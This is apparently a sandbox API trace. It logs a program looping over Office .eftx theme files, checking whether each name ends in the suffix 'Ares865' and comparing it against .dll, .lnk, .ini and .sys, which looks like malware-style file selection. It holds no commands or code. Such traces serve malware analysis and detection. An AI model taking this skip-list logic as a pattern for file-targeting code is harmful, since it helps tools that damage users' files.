lstrcmpiW (lpString1="Apothecary.eftx", lpString2=".ini") returned 1 [0073.787] lstrlenW (lpString=".sys") returned 4 [0073.787] lstrcmpiW (lpString1="Apothecary.eftx", lpString2=".sys") returned 1 [0073.787] lstrlenW (lpString="Apothecary.eftx") returned 15 [0073.787] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Aspect.eftx" | out: lpString1="Aspect.eftx") returned="Aspect.eftx" [0073.787] lstrlenW (lpString="Aspect.eftx") returned 11 [0073.787] lstrlenW (lpString="Ares865") returned 7 [0073.787] lstrcmpiW (lpString1="ct.eftx", lpString2="Ares865") returned 1 [0073.787] lstrlenW (lpString=".dll") returned 4 [0073.787] lstrcmpiW (lpString1="Aspect.eftx", lpString2=".dll") returned 1 [0073.787] lstrlenW (lpString=".lnk") returned 4 [0073.787] lstrcmpiW (lpString1="Aspect.eftx", lpString2=".lnk") returned 1 [0073.787] lstrlenW (lpString=".ini") returned 4 [0073.787] lstrcmpiW (lpString1="Aspect.eftx", lpString2=".ini") returned 1 [0073.787] lstrlenW (lpString=".sys") returned 4 [0073.787] lstrcmpiW (lpString1="Aspect.eftx", lpString2=".sys") returned 1 [0073.787] lstrlenW (lpString="Aspect.eftx") returned 11 [0073.788] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Austin.eftx" | out: lpString1="Austin.eftx") returned="Austin.eftx" [0073.788] lstrlenW (lpString="Austin.eftx") returned 11 [0073.788] lstrlenW (lpString="Ares865") returned 7 [0073.788] lstrcmpiW (lpString1="in.eftx", lpString2="Ares865") returned 1 [0073.788] lstrlenW (lpString=".dll") returned 4 [0073.788] lstrcmpiW (lpString1="Austin.eftx", lpString2=".dll") returned 1 [0073.788] lstrlenW (lpString=".lnk") returned 4 [0073.788] lstrcmpiW (lpString1="Austin.eftx", lpString2=".lnk") returned 1 [0073.788] lstrlenW (lpString=".ini") returned 4 [0073.788] lstrcmpiW (lpString1="Austin.eftx", lpString2=".ini") returned 1 [0073.788] lstrlenW (lpString=".sys") returned 4 [0073.788] lstrcmpiW (lpString1="Austin.eftx", lpString2=".sys") returned 1 [0073.788] lstrlenW (lpString="Austin.eftx") returned 11 [0073.788] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Black Tie.eftx" | out: lpString1="Black Tie.eftx") returned="Black Tie.eftx" [0073.788] lstrlenW (lpString="Black Tie.eftx") returned 14 [0073.788] lstrlenW (lpString="Ares865") returned 7 [0073.788] lstrcmpiW (lpString1="ie.eftx", lpString2="Ares865") returned 1 [0073.788] lstrlenW (lpString=".dll") returned 4 [0073.788] lstrcmpiW (lpString1="Black Tie.eftx", lpString2=".dll") returned 1 [0073.788] lstrlenW (lpString=".lnk") returned 4 [0073.788] lstrcmpiW (lpString1="Black Tie.eftx", lpString2=".lnk") returned 1 [0073.788] lstrlenW (lpString=".ini") returned 4 [0073.788] lstrcmpiW (lpString1="Black Tie.eftx", lpString2=".ini") returned 1 [0073.788] lstrlenW (lpString=".sys") returned 4 [0073.788] lstrcmpiW (lpString1="Black Tie.eftx", lpString2=".sys") returned 1 [0073.788] lstrlenW (lpString="Black Tie.eftx") returned 14 [0073.788] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Civic.eftx" | out: lpString1="Civic.eftx") returned="Civic.eftx" [0073.788] lstrlenW (lpString="Civic.eftx") returned 10 [0073.788] lstrlenW (lpString="Ares865") returned 7 [0073.788] lstrcmpiW (lpString1="ic.eftx", lpString2="Ares865") returned 1 [0073.788] lstrlenW (lpString=".dll") returned 4 [0073.788] lstrcmpiW (lpString1="Civic.eftx", lpString2=".dll") returned 1 [0073.788] lstrlenW (lpString=".lnk") returned 4 [0073.788] lstrcmpiW (lpString1="Civic.eftx", lpString2=".lnk") returned 1 [0073.789] lstrlenW (lpString=".ini") returned 4 [0073.789] lstrcmpiW (lpString1="Civic.eftx", lpString2=".ini") returned 1 [0073.789] lstrlenW (lpString=".sys") returned 4 [0073.789] lstrcmpiW (lpString1="Civic.eftx", lpString2=".sys") returned 1 [0073.789] lstrlenW (lpString="Civic.eftx") returned 10 [0073.789] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Clarity.eftx" | out: lpString1="Clarity.eftx") returned="Clarity.eftx" [0073.789] lstrlenW (lpString="Clarity.eftx") returned 12 [0073.789] lstrlenW (lpString="Ares865") returned 7 [0073.789] lstrcmpiW (lpString1="ty.eftx", lpString2="Ares865") returned 1 [0073.789] lstrlenW (lpString=".dll") returned 4 [0073.789] lstrcmpiW (lpString1="Clarity.eftx", lpString2=".dll") returned 1 [0073.789] lstrlenW (lpString=".lnk") returned 4 [0073.789] lstrcmpiW (lpString1="Clarity.eftx", lpString2=".lnk") returned 1 [0073.789] lstrlenW (lpString=".ini") returned 4 [0073.789] lstrcmpiW (lpString1="Clarity.eftx", lpString2=".ini") returned 1 [0073.789] lstrlenW (lpString=".sys") returned 4 [0073.789] lstrcmpiW (lpString1="Clarity.eftx", lpString2=".sys") returned 1 [0073.789] lstrlenW (lpString="Clarity.eftx") returned 12 [0073.789] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Composite.eftx" | out: lpString1="Composite.eftx") returned="Composite.eftx" [0073.789] lstrlenW (lpString="Composite.eftx") returned 14 [0073.789] lstrlenW (lpString="Ares865") returned 7 [0073.789] lstrcmpiW (lpString1="te.eftx", lpString2="Ares865") returned 1 [0073.789] lstrlenW (lpString=".dll") returned 4 [0073.789] lstrcmpiW (lpString1="Composite.eftx", lpString2=".dll") returned 1 [0073.789] lstrlenW (lpString=".lnk") returned 4 [0073.789] lstrcmpiW (lpString1="Composite.eftx", lpString2=".lnk") returned 1 [0073.789] lstrlenW (lpString=".ini") returned 4 [0073.789] lstrcmpiW (lpString1="Composite.eftx", lpString2=".ini") returned 1 [0073.789] lstrlenW (lpString=".sys") returned 4 [0073.789] lstrcmpiW (lpString1="Composite.eftx", lpString2=".sys") returned 1 [0073.789] lstrlenW (lpString="Composite.eftx") returned 14 [0073.789] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Concourse.eftx" | out: lpString1="Concourse.eftx") returned="Concourse.eftx" [0073.790] lstrlenW (lpString="Concourse.eftx") returned 14 [0073.790] lstrlenW (lpString="Ares865") returned 7 [0073.790] lstrcmpiW (lpString1="se.eftx", lpString2="Ares865") returned 1 [0073.790] lstrlenW (lpString=".dll") returned 4 [0073.790] lstrcmpiW (lpString1="Concourse.eftx", lpString2=".dll") returned 1 [0073.790] lstrlenW (lpString=".lnk") returned 4 [0073.790] lstrcmpiW (lpString1="Concourse.eftx", lpString2=".lnk") returned 1 [0073.790] lstrlenW (lpString=".ini") returned 4 [0073.790] lstrcmpiW (lpString1="Concourse.eftx", lpString2=".ini") returned 1 [0073.790] lstrlenW (lpString=".sys") returned 4 [0073.790] lstrcmpiW (lpString1="Concourse.eftx", lpString2=".sys") returned 1 [0073.790] lstrlenW (lpString="Concourse.eftx") returned 14 [0073.790] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Couture.eftx" | out: lpString1="Couture.eftx") returned="Couture.eftx" [0073.790] lstrlenW (lpString="Couture.eftx") returned 12 [0073.790] lstrlenW (lpString="Ares865") returned 7 [0073.790] lstrcmpiW (lpString1="re.eftx", lpString2="Ares865") returned 1 [0073.790] lstrlenW (lpString=".dll") returned 4 [0073.790] lstrcmpiW (lpString1="Couture.eftx", lpString2=".dll") returned 1 [0073.790] lstrlenW (lpString=".lnk") returned 4 [0073.790] lstrcmpiW (lpString1="Couture.eftx", lpString2=".lnk") returned 1 [0073.790] lstrlenW (lpString=".ini") returned 4 [0073.790] lstrcmpiW (lpString1="Couture.eftx", lpString2=".ini") returned 1 [0073.790] lstrlenW (lpString=".sys") returned 4 [0073.790] lstrcmpiW (lpString1="Couture.eftx", lpString2=".sys") returned 1 [0073.790] lstrlenW (lpString="Couture.eftx") returned 12 [0073.790] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Elemental.eftx" | out: lpString1="Elemental.eftx") returned="Elemental.eftx" [0073.790] lstrlenW (lpString="Elemental.eftx") returned 14 [0073.790] lstrlenW (lpString="Ares865") returned 7 [0073.790] lstrcmpiW (lpString1="al.eftx", lpString2="Ares865") returned -1 [0073.790] lstrlenW (lpString=".dll") returned 4 [0073.790] lstrcmpiW (lpString1="Elemental.eftx", lpString2=".dll") returned 1 [0073.790] lstrlenW (lpString=".lnk") returned 4 [0073.790] lstrcmpiW (lpString1="Elemental.eftx", lpString2=".lnk") returned 1 [0073.790] lstrlenW (lpString=".ini") returned 4 [0073.791] lstrcmpiW (lpString1="Elemental.eftx", lpString2=".ini") returned 1 [0073.791] lstrlenW (lpString=".sys") returned 4 [0073.791] lstrcmpiW (lpString1="Elemental.eftx", lpString2=".sys") returned 1 [0073.791] lstrlenW (lpString="Elemental.eftx") returned 14 [0073.791] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Equity.eftx" | out: lpString1="Equity.eftx") returned="Equity.eftx" [0073.791] lstrlenW (lpString="Equity.eftx") returned 11 [0073.791] lstrlenW (lpString="Ares865") returned 7 [0073.791] lstrcmpiW (lpString1="ty.eftx", lpString2="Ares865") returned 1 [0073.791] lstrlenW (lpString=".dll") returned 4 [0073.791] lstrcmpiW (lpString1="Equity.eftx", lpString2=".dll") returned 1 [0073.791] lstrlenW (lpString=".lnk") returned 4 [0073.791] lstrcmpiW (lpString1="Equity.eftx", lpString2=".lnk") returned 1 [0073.791] lstrlenW (lpString=".ini") returned 4 [0073.791] lstrcmpiW (lpString1="Equity.eftx", lpString2=".ini") returned 1 [0073.791] lstrlenW (lpString=".sys") returned 4 [0073.791] lstrcmpiW (lpString1="Equity.eftx", lpString2=".sys") returned 1 [0073.791] lstrlenW (lpString="Equity.eftx") returned 11 [0073.791] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Essential.eftx" | out: lpString1="Essential.eftx") returned="Essential.eftx" [0073.791] lstrlenW (lpString="Essential.eftx") returned 14 [0073.791] lstrlenW (lpString="Ares865") returned 7 [0073.791] lstrcmpiW (lpString1="al.eftx", lpString2="Ares865") returned -1 [0073.791] lstrlenW (lpString=".dll") returned 4 [0073.791] lstrcmpiW (lpString1="Essential.eftx", lpString2=".dll") returned 1 [0073.791] lstrlenW (lpString=".lnk") returned 4 [0073.791] lstrcmpiW (lpString1="Essential.eftx", lpString2=".lnk") returned 1 [0073.791] lstrlenW (lpString=".ini") returned 4 [0073.791] lstrcmpiW (lpString1="Essential.eftx", lpString2=".ini") returned 1 [0073.791] lstrlenW (lpString=".sys") returned 4 [0073.791] lstrcmpiW (lpString1="Essential.eftx", lpString2=".sys") returned 1 [0073.791] lstrlenW (lpString="Essential.eftx") returned 14 [0073.791] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Executive.eftx" | out: lpString1="Executive.eftx") returned="Executive.eftx" [0073.792] lstrlenW (lpString="Executive.eftx") returned 14 [0073.792] lstrlenW (lpString="Ares865") returned 7 [0073.792] lstrcmpiW (lpString1="ve.eftx", lpString2="Ares865") returned 1 [0073.792] lstrlenW (lpString=".dll") returned 4 [0073.792] lstrcmpiW (lpString1="Executive.eftx", lpString2=".dll") returned 1 [0073.792] lstrlenW (lpString=".lnk") returned 4 [0073.792] lstrcmpiW (lpString1="Executive.eftx", lpString2=".lnk") returned 1 [0073.792] lstrlenW (lpString=".ini") returned 4 [0073.792] lstrcmpiW (lpString1="Executive.eftx", lpString2=".ini") returned 1 [0073.792] lstrlenW (lpString=".sys") returned 4 [0073.792] lstrcmpiW (lpString1="Executive.eftx", lpString2=".sys") returned 1 [0073.792] lstrlenW (lpString="Executive.eftx") returned 14 [0073.792] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Flow.eftx" | out: lpString1="Flow.eftx") returned="Flow.eftx" [0073.792] lstrlenW (lpString="Flow.eftx") returned 9 [0073.792] lstrlenW (lpString="Ares865") returned 7 [0073.792] lstrcmpiW (lpString1="ow.eftx", lpString2="Ares865") returned 1 [0073.792] lstrlenW (lpString=".dll") returned 4 [0073.792] lstrcmpiW (lpString1="Flow.eftx", lpString2=".dll") returned 1 [0073.792] lstrlenW (lpString=".lnk") returned 4 [0073.792] lstrcmpiW (lpString1="Flow.eftx", lpString2=".lnk") returned 1 [0073.792] lstrlenW (lpString=".ini") returned 4 [0073.792] lstrcmpiW (lpString1="Flow.eftx", lpString2=".ini") returned 1 [0073.792] lstrlenW (lpString=".sys") returned 4 [0073.792] lstrcmpiW (lpString1="Flow.eftx", lpString2=".sys") returned 1 [0073.792] lstrlenW (lpString="Flow.eftx") returned 9 [0073.792] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Foundry.eftx" | out: lpString1="Foundry.eftx") returned="Foundry.eftx" [0073.792] lstrlenW (lpString="Foundry.eftx") returned 12 [0073.792] lstrlenW (lpString="Ares865") returned 7 [0073.792] lstrcmpiW (lpString1="ry.eftx", lpString2="Ares865") returned 1 [0073.792] lstrlenW (lpString=".dll") returned 4 [0073.792] lstrcmpiW (lpString1="Foundry.eftx", lpString2=".dll") returned 1 [0073.792] lstrlenW (lpString=".lnk") returned 4 [0073.792] lstrcmpiW (lpString1="Foundry.eftx", lpString2=".lnk") returned 1 [0073.792] lstrlenW (lpString=".ini") returned 4 [0073.793] lstrcmpiW (lpString1="Foundry.eftx", lpString2=".ini") returned 1 [0073.793] lstrlenW (lpString=".sys") returned 4 [0073.793] lstrcmpiW (lpString1="Foundry.eftx", lpString2=".sys") returned 1 [0073.793] lstrlenW (lpString="Foundry.eftx") returned 12 [0073.793] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Grid.eftx" | out: lpString1="Grid.eftx") returned="Grid.eftx" [0073.793] lstrlenW (lpString="Grid.eftx") returned 9 [0073.793] lstrlenW (lpString="Ares865") returned 7 [0073.793] lstrcmpiW (lpString1="id.eftx", lpString2="Ares865") returned 1 [0073.793] lstrlenW (lpString=".dll") returned 4 [0073.793] lstrcmpiW (lpString1="Grid.eftx", lpString2=".dll") returned 1 [0073.793] lstrlenW (lpString=".lnk") returned 4 [0073.793] lstrcmpiW (lpString1="Grid.eftx", lpString2=".lnk") returned 1 [0073.793] lstrlenW (lpString=".ini") returned 4 [0073.793] lstrcmpiW (lpString1="Grid.eftx", lpString2=".ini") returned 1 [0073.793] lstrlenW (lpString=".sys") returned 4 [0073.793] lstrcmpiW (lpString1="Grid.eftx", lpString2=".sys") returned 1 [0073.793] lstrlenW (lpString="Grid.eftx") returned 9 [0073.793] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Hardcover.eftx" | out: lpString1="Hardcover.eftx") returned="Hardcover.eftx" [0073.793] lstrlenW (lpString="Hardcover.eftx") returned 14 [0073.793] lstrlenW (lpString="Ares865") returned 7 [0073.793] lstrcmpiW (lpString1="er.eftx", lpString2="Ares865") returned 1 [0073.793] lstrlenW (lpString=".dll") returned 4 [0073.793] lstrcmpiW (lpString1="Hardcover.eftx", lpString2=".dll") returned 1 [0073.793] lstrlenW (lpString=".lnk") returned 4 [0073.793] lstrcmpiW (lpString1="Hardcover.eftx", lpString2=".lnk") returned 1 [0073.793] lstrlenW (lpString=".ini") returned 4 [0073.793] lstrcmpiW (lpString1="Hardcover.eftx", lpString2=".ini") returned 1 [0073.793] lstrlenW (lpString=".sys") returned 4 [0073.793] lstrcmpiW (lpString1="Hardcover.eftx", lpString2=".sys") returned 1 [0073.793] lstrlenW (lpString="Hardcover.eftx") returned 14 [0073.793] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Horizon.eftx" | out: lpString1="Horizon.eftx") returned="Horizon.eftx" [0073.793] lstrlenW (lpString="Horizon.eftx") returned 12 [0073.794] lstrlenW (lpString="Ares865") returned 7 [0073.794] lstrcmpiW (lpString1="on.eftx", lpString2="Ares865") returned 1 [0073.794] lstrlenW (lpString=".dll") returned 4 [0073.794] lstrcmpiW (lpString1="Horizon.eftx", lpString2=".dll") returned 1 [0073.794] lstrlenW (lpString=".lnk") returned 4 [0073.794] lstrcmpiW (lpString1="Horizon.eftx", lpString2=".lnk") returned 1 [0073.794] lstrlenW (lpString=".ini") returned 4 [0073.794] lstrcmpiW (lpString1="Horizon.eftx", lpString2=".ini") returned 1 [0073.794] lstrlenW (lpString=".sys") returned 4 [0073.794] lstrcmpiW (lpString1="Horizon.eftx", lpString2=".sys") returned 1 [0073.794] lstrlenW (lpString="Horizon.eftx") returned 12 [0073.794] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Median.eftx" | out: lpString1="Median.eftx") returned="Median.eftx" [0073.794] lstrlenW (lpString="Median.eftx") returned 11 [0073.794] lstrlenW (lpString="Ares865") returned 7 [0073.794] lstrcmpiW (lpString1="an.eftx", lpString2="Ares865") returned -1 [0073.794] lstrlenW (lpString=".dll") returned 4 [0073.794] lstrcmpiW (lpString1="Median.eftx", lpString2=".dll") returned 1 [0073.794] lstrlenW (lpString=".lnk") returned 4 [0073.794] lstrcmpiW (lpString1="Median.eftx", lpString2=".lnk") returned 1 [0073.794] lstrlenW (lpString=".ini") returned 4 [0073.794] lstrcmpiW (lpString1="Median.eftx", lpString2=".ini") returned 1 [0073.794] lstrlenW (lpString=".sys") returned 4 [0073.794] lstrcmpiW (lpString1="Median.eftx", lpString2=".sys") returned 1 [0073.794] lstrlenW (lpString="Median.eftx") returned 11 [0073.794] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Metro.eftx" | out: lpString1="Metro.eftx") returned="Metro.eftx" [0073.794] lstrlenW (lpString="Metro.eftx") returned 10 [0073.794] lstrlenW (lpString="Ares865") returned 7 [0073.794] lstrcmpiW (lpString1="ro.eftx", lpString2="Ares865") returned 1 [0073.794] lstrlenW (lpString=".dll") returned 4 [0073.794] lstrcmpiW (lpString1="Metro.eftx", lpString2=".dll") returned 1 [0073.794] lstrlenW (lpString=".lnk") returned 4 [0073.794] lstrcmpiW (lpString1="Metro.eftx", lpString2=".lnk") returned 1 [0073.794] lstrlenW (lpString=".ini") returned 4 [0073.794] lstrcmpiW (lpString1="Metro.eftx", lpString2=".ini") returned 1 [0073.795] lstrlenW (lpString=".sys") returned 4 [0073.795] lstrcmpiW (lpString1="Metro.eftx", lpString2=".sys") returned 1 [0073.795] lstrlenW (lpString="Metro.eftx") returned 10 [0073.795] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Module.eftx" | out: lpString1="Module.eftx") returned="Module.eftx" [0073.795] lstrlenW (lpString="Module.eftx") returned 11 [0073.795] lstrlenW (lpString="Ares865") returned 7 [0073.795] lstrcmpiW (lpString1="le.eftx", lpString2="Ares865") returned 1 [0073.795] lstrlenW (lpString=".dll") returned 4 [0073.795] lstrcmpiW (lpString1="Module.eftx", lpString2=".dll") returned 1 [0073.795] lstrlenW (lpString=".lnk") returned 4 [0073.795] lstrcmpiW (lpString1="Module.eftx", lpString2=".lnk") returned 1 [0073.795] lstrlenW (lpString=".ini") returned 4 [0073.795] lstrcmpiW (lpString1="Module.eftx", lpString2=".ini") returned 1 [0073.795] lstrlenW (lpString=".sys") returned 4 [0073.795] lstrcmpiW (lpString1="Module.eftx", lpString2=".sys") returned 1 [0073.795] lstrlenW (lpString="Module.eftx") returned 11 [0073.795] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Newsprint.eftx" | out: lpString1="Newsprint.eftx") returned="Newsprint.eftx" [0073.795] lstrlenW (lpString="Newsprint.eftx") returned 14 [0073.795] lstrlenW (lpString="Ares865") returned 7 [0073.795] lstrcmpiW (lpString1="nt.eftx", lpString2="Ares865") returned 1 [0073.795] lstrlenW (lpString=".dll") returned 4 [0073.795] lstrcmpiW (lpString1="Newsprint.eftx", lpString2=".dll") returned 1 [0073.795] lstrlenW (lpString=".lnk") returned 4 [0073.795] lstrcmpiW (lpString1="Newsprint.eftx", lpString2=".lnk") returned 1 [0073.795] lstrlenW (lpString=".ini") returned 4 [0073.795] lstrcmpiW (lpString1="Newsprint.eftx", lpString2=".ini") returned 1 [0073.795] lstrlenW (lpString=".sys") returned 4 [0073.795] lstrcmpiW (lpString1="Newsprint.eftx", lpString2=".sys") returned 1 [0073.795] lstrlenW (lpString="Newsprint.eftx") returned 14 [0073.795] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Opulent.eftx" | out: lpString1="Opulent.eftx") returned="Opulent.eftx" [0073.795] lstrlenW (lpString="Opulent.eftx") returned 12 [0073.795] lstrlenW (lpString="Ares865") returned 7 [0073.796] lstrcmpiW (lpString1="nt.eftx", lpString2="Ares865") returned 1 [0073.796] lstrlenW (lpString=".dll") returned 4 [0073.796] lstrcmpiW (lpString1="Opulent.eftx", lpString2=".dll") returned 1 [0073.796] lstrlenW (lpString=".lnk") returned 4 [0073.796] lstrcmpiW (lpString1="Opulent.eftx", lpString2=".lnk") returned 1 [0073.796] lstrlenW (lpString=".ini") returned 4 [0073.796] lstrcmpiW (lpString1="Opulent.eftx", lpString2=".ini") returned 1 [0073.796] lstrlenW (lpString=".sys") returned 4 [0073.796] lstrcmpiW (lpString1="Opulent.eftx", lpString2=".sys") returned 1 [0073.796] lstrlenW (lpString="Opulent.eftx") returned 12 [0073.796] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Oriel.eftx" | out: lpString1="Oriel.eftx") returned="Oriel.eftx" [0073.796] lstrlenW (lpString="Oriel.eftx") returned 10 [0073.796] lstrlenW (lpString="Ares865") returned 7 [0073.796] lstrcmpiW (lpString1="el.eftx", lpString2="Ares865") returned 1 [0073.796] lstrlenW (lpString=".dll") returned 4 [0073.796] lstrcmpiW (lpString1="Oriel.eftx", lpString2=".dll") returned 1 [0073.796] lstrlenW (lpString=".lnk") returned 4 [0073.796] lstrcmpiW (lpString1="Oriel.eftx", lpString2=".lnk") returned 1 [0073.796] lstrlenW (lpString=".ini") returned 4 [0073.796] lstrcmpiW (lpString1="Oriel.eftx", lpString2=".ini") returned 1 [0073.796] lstrlenW (lpString=".sys") returned 4 [0073.796] lstrcmpiW (lpString1="Oriel.eftx", lpString2=".sys") returned 1 [0073.796] lstrlenW (lpString="Oriel.eftx") returned 10 [0073.796] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Origin.eftx" | out: lpString1="Origin.eftx") returned="Origin.eftx" [0073.796] lstrlenW (lpString="Origin.eftx") returned 11 [0073.796] lstrlenW (lpString="Ares865") returned 7 [0073.796] lstrcmpiW (lpString1="in.eftx", lpString2="Ares865") returned 1 [0073.796] lstrlenW (lpString=".dll") returned 4 [0073.796] lstrcmpiW (lpString1="Origin.eftx", lpString2=".dll") returned 1 [0073.796] lstrlenW (lpString=".lnk") returned 4 [0073.796] lstrcmpiW (lpString1="Origin.eftx", lpString2=".lnk") returned 1 [0073.796] lstrlenW (lpString=".ini") returned 4 [0073.796] lstrcmpiW (lpString1="Origin.eftx", lpString2=".ini") returned 1 [0073.796] lstrlenW (lpString=".sys") returned 4 [0073.797] lstrcmpiW (lpString1="Origin.eftx", lpString2=".sys") returned 1 [0073.797] lstrlenW (lpString="Origin.eftx") returned 11 [0073.797] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Paper.eftx" | out: lpString1="Paper.eftx") returned="Paper.eftx" [0073.797] lstrlenW (lpString="Paper.eftx") returned 10 [0073.797] lstrlenW (lpString="Ares865") returned 7 [0073.797] lstrcmpiW (lpString1="er.eftx", lpString2="Ares865") returned 1 [0073.797] lstrlenW (lpString=".dll") returned 4 [0073.797] lstrcmpiW (lpString1="Paper.eftx", lpString2=".dll") returned 1 [0073.797] lstrlenW (lpString=".lnk") returned 4 [0073.797] lstrcmpiW (lpString1="Paper.eftx", lpString2=".lnk") returned 1 [0073.797] lstrlenW (lpString=".ini") returned 4 [0073.797] lstrcmpiW (lpString1="Paper.eftx", lpString2=".ini") returned 1 [0073.797] lstrlenW (lpString=".sys") returned 4 [0073.797] lstrcmpiW (lpString1="Paper.eftx", lpString2=".sys") returned 1 [0073.797] lstrlenW (lpString="Paper.eftx") returned 10 [0073.797] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Perspective.eftx" | out: lpString1="Perspective.eftx") returned="Perspective.eftx" [0073.797] lstrlenW (lpString="Perspective.eftx") returned 16 [0073.797] lstrlenW (lpString="Ares865") returned 7 [0073.797] lstrcmpiW (lpString1="ve.eftx", lpString2="Ares865") returned 1 [0073.797] lstrlenW (lpString=".dll") returned 4 [0073.797] lstrcmpiW (lpString1="Perspective.eftx", lpString2=".dll") returned 1 [0073.797] lstrlenW (lpString=".lnk") returned 4 [0073.797] lstrcmpiW (lpString1="Perspective.eftx", lpString2=".lnk") returned 1 [0073.797] lstrlenW (lpString=".ini") returned 4 [0073.797] lstrcmpiW (lpString1="Perspective.eftx", lpString2=".ini") returned 1 [0073.797] lstrlenW (lpString=".sys") returned 4 [0073.797] lstrcmpiW (lpString1="Perspective.eftx", lpString2=".sys") returned 1 [0073.797] lstrlenW (lpString="Perspective.eftx") returned 16 [0073.797] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Pushpin.eftx" | out: lpString1="Pushpin.eftx") returned="Pushpin.eftx" [0073.797] lstrlenW (lpString="Pushpin.eftx") returned 12 [0073.798] lstrlenW (lpString="Ares865") returned 7 [0073.798] lstrcmpiW (lpString1="in.eftx", lpString2="Ares865") returned 1 [0073.798] lstrlenW (lpString=".dll") returned 4 [0073.798] lstrcmpiW (lpString1="Pushpin.eftx", lpString2=".dll") returned 1 [0073.798] lstrlenW (lpString=".lnk") returned 4 [0073.798] lstrcmpiW (lpString1="Pushpin.eftx", lpString2=".lnk") returned 1 [0073.798] lstrlenW (lpString=".ini") returned 4 [0073.798] lstrcmpiW (lpString1="Pushpin.eftx", lpString2=".ini") returned 1 [0073.798] lstrlenW (lpString=".sys") returned 4 [0073.798] lstrcmpiW (lpString1="Pushpin.eftx", lpString2=".sys") returned 1 [0073.798] lstrlenW (lpString="Pushpin.eftx") returned 12 [0073.798] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Slipstream.eftx" | out: lpString1="Slipstream.eftx") returned="Slipstream.eftx" [0073.798] lstrlenW (lpString="Slipstream.eftx") returned 15 [0073.798] lstrlenW (lpString="Ares865") returned 7 [0073.798] lstrcmpiW (lpString1="am.eftx", lpString2="Ares865") returned -1 [0073.798] lstrlenW (lpString=".dll") returned 4 [0073.798] lstrcmpiW (lpString1="Slipstream.eftx", lpString2=".dll") returned 1 [0073.798] lstrlenW (lpString=".lnk") returned 4 [0073.798] lstrcmpiW (lpString1="Slipstream.eftx", lpString2=".lnk") returned 1 [0073.798] lstrlenW (lpString=".ini") returned 4 [0073.798] lstrcmpiW (lpString1="Slipstream.eftx", lpString2=".ini") returned 1 [0073.798] lstrlenW (lpString=".sys") returned 4 [0073.798] lstrcmpiW (lpString1="Slipstream.eftx", lpString2=".sys") returned 1 [0073.798] lstrlenW (lpString="Slipstream.eftx") returned 15 [0073.798] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Solstice.eftx" | out: lpString1="Solstice.eftx") returned="Solstice.eftx" [0073.798] lstrlenW (lpString="Solstice.eftx") returned 13 [0073.798] lstrlenW (lpString="Ares865") returned 7 [0073.798] lstrcmpiW (lpString1="ce.eftx", lpString2="Ares865") returned 1 [0073.798] lstrlenW (lpString=".dll") returned 4 [0073.798] lstrcmpiW (lpString1="Solstice.eftx", lpString2=".dll") returned 1 [0073.799] lstrlenW (lpString=".lnk") returned 4 [0073.799] lstrcmpiW (lpString1="Solstice.eftx", lpString2=".lnk") returned 1 [0073.799] lstrlenW (lpString=".ini") returned 4 [0073.799] lstrcmpiW (lpString1="Solstice.eftx", lpString2=".ini") returned 1 [0073.799] lstrlenW (lpString=".sys") returned 4 [0073.799] lstrcmpiW (lpString1="Solstice.eftx", lpString2=".sys") returned 1 [0073.799] lstrlenW (lpString="Solstice.eftx") returned 13 [0073.799] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Technic.eftx" | out: lpString1="Technic.eftx") returned="Technic.eftx" [0073.799] lstrlenW (lpString="Technic.eftx") returned 12 [0073.799] lstrlenW (lpString="Ares865") returned 7 [0073.799] lstrcmpiW (lpString1="ic.eftx", lpString2="Ares865") returned 1 [0073.799] lstrlenW (lpString=".dll") returned 4 [0073.799] lstrcmpiW (lpString1="Technic.eftx", lpString2=".dll") returned 1 [0073.799] lstrlenW (lpString=".lnk") returned 4 [0073.799] lstrcmpiW (lpString1="Technic.eftx", lpString2=".lnk") returned 1 [0073.799] lstrlenW (lpString=".ini") returned 4 [0073.799] lstrcmpiW (lpString1="Technic.eftx", lpString2=".ini") returned 1 [0073.799] lstrlenW (lpString=".sys") returned 4 [0073.799] lstrcmpiW (lpString1="Technic.eftx", lpString2=".sys") returned 1 [0073.799] lstrlenW (lpString="Technic.eftx") returned 12 [0073.799] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Thatch.eftx" | out: lpString1="Thatch.eftx") returned="Thatch.eftx" [0073.799] lstrlenW (lpString="Thatch.eftx") returned 11 [0073.799] lstrlenW (lpString="Ares865") returned 7 [0073.799] lstrcmpiW (lpString1="ch.eftx", lpString2="Ares865") returned 1 [0073.799] lstrlenW (lpString=".dll") returned 4 [0073.799] lstrcmpiW (lpString1="Thatch.eftx", lpString2=".dll") returned 1 [0073.799] lstrlenW (lpString=".lnk") returned 4 [0073.799] lstrcmpiW (lpString1="Thatch.eftx", lpString2=".lnk") returned 1 [0073.799] lstrlenW (lpString=".ini") returned 4 [0073.799] lstrcmpiW (lpString1="Thatch.eftx", lpString2=".ini") returned 1 [0073.799] lstrlenW (lpString=".sys") returned 4 [0073.799] lstrcmpiW (lpString1="Thatch.eftx", lpString2=".sys") returned 1 [0073.799] lstrlenW (lpString="Thatch.eftx") returned 11 [0073.800] 